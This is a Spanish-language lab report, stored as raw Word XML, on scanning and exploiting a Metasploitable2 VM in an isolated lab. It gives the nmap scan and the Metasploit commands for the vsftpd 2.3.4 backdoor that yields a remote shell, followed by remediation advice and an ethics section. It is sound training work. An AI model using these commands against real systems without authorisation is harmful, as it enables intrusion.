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39367" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Informe Técnico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553ABFB1" w14:textId="549B9218" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaneo y Explotación de una Máquina Vulnerable con Kali Linux y Vulnhub – Lección </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8CB02" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:r w:rsidRPr="001F3275">
        <w:pict w14:anchorId="50DC0F3C">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF0E02C" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>1. Escenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD4C6A8" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Se descargó e importó una máquina vulnerable desde </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Vulnhub</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ejemplo: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Metasploitable2</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">). El entorno se configuró en </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">, con Kali Linux como atacante y la VM vulnerable como objetivo, conectadas en </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>red interna</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> para garantizar aislamiento. El objetivo del laboratorio fue realizar un </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>escaneo de servicios</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>, identificar vulnerabilidades y simular una explotación controlada, aplicando un enfoque ético y documentado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D61099" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:r w:rsidRPr="001F3275">
        <w:pict w14:anchorId="25414970">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4770D6" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Metodología</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C07E82" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuración del entorno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2327C" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Se verificó conectividad entre Kali y la VM vulnerable con ping &lt;IP objetivo&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E177465" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Escaneo con Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D92D1F" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:t>nmap -sS -sV -O 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA4BD6D" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Puertos abiertos:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> 21 (FTP), 22 (SSH), 80 (HTTP), 3306 (MySQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D03DD28" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Servicios detectados:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> vsftpd 2.3.4, OpenSSH 4.7, Apache 2.2.8, MySQL 5.0.51.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28482A37" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Análisis de vulnerabilidades (ejemplo: vsftpd 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73883BEC" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2011-2523: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Backdoor en vsftpd que permite obtener una shell remota tras login con “:)”</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6FB290" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Simulación de explotación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74221274" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:t xml:space="preserve">Se utilizó </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2AEBAB" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9FDEF4" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F391CB0" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:t>set RHOST 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0E9B46" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4467B8B3" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Resultado: acceso a shell remota con privilegios de usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2596EC" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:r w:rsidRPr="001F3275">
        <w:pict w14:anchorId="54AB22F4">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1BCB26" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184D74D5" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Se identificaron múltiples servicios expuestos con versiones antiguas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E87C4F3" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Se confirmó la explotación del servicio </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>FTP vsftpd 2.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>, logrando acceso no autorizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B999B" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>El hallazgo demuestra la criticidad de mantener servicios actualizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160CEEA" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:r w:rsidRPr="001F3275">
        <w:pict w14:anchorId="4468DF9B">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EEA74C" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Recomendaciones de Seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6394E29A" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Actualizar vsftpd y otros servicios</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> a versiones corregidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C61F89" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Restringir accesos externos a servicios críticos (FTP, MySQL) mediante firewall y segmentación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B4B2B3" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Implementar monitoreo y alertas ante intentos de explotación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17382E09" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Reforzar autenticación con </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>MFA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> en accesos administrativos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614ABACD" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Desplegar un ciclo de </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>gestión de vulnerabilidades</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> con parches periódicos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED38C5" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:r w:rsidRPr="001F3275">
        <w:pict w14:anchorId="0657058B">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A79F6E" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>5. Reflexión Ética</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9C0BD6" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">El laboratorio demostró que las vulnerabilidades explotadas de forma no ética pueden comprometer gravemente la infraestructura de una organización. Sin embargo, en un entorno controlado, estas prácticas son valiosas para aprender técnicas de ataque y diseñar defensas efectivas. Un profesional en ciberseguridad debe aplicar estas habilidades únicamente en auditorías autorizadas, respetando los principios de la </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>ética y legalidad</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037EF886" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:r w:rsidRPr="001F3275">
        <w:pict w14:anchorId="537C5CDE">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3910CFBF" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>6. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FEAC86" w14:textId="77777777" w:rsidR="001F3275" w:rsidRPr="001F3275" w:rsidRDefault="001F3275" w:rsidP="001F3275">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">El ejercicio permitió aplicar las fases básicas de un </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">: reconocimiento, escaneo, análisis de vulnerabilidades y explotación. Se comprobó que sistemas desactualizados representan un riesgo crítico y requieren medidas inmediatas. La práctica reforzó la </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">importancia del </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>pentesting ético</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3275">
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> como herramienta para mejorar la seguridad y reducir la exposición a ciberataques reales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BEAE47" w14:textId="77777777" w:rsidR="00331103" w:rsidRPr="001F3275" w:rsidRDefault="00331103">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00331103" w:rsidRPr="001F3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A74558"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E5C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6C32A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="917A8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C203F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA88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4714351">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1217625002">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2055231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E1C"/>
    <w:rsid w:val="0008748B"/>
    <w:rsid w:val="001F3275"/>
    <w:rsid w:val="00304E1C"/>
    <w:rsid w:val="00331103"/>
    <w:rsid w:val="007A0D76"/>
    <w:rsid w:val="00F45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DBC8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B831BE3C-8A36-4405-8FE2-9E88E64B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E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E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E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E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E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E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E1C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00304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E1C"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00304E1C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00304E1C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00304E1C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
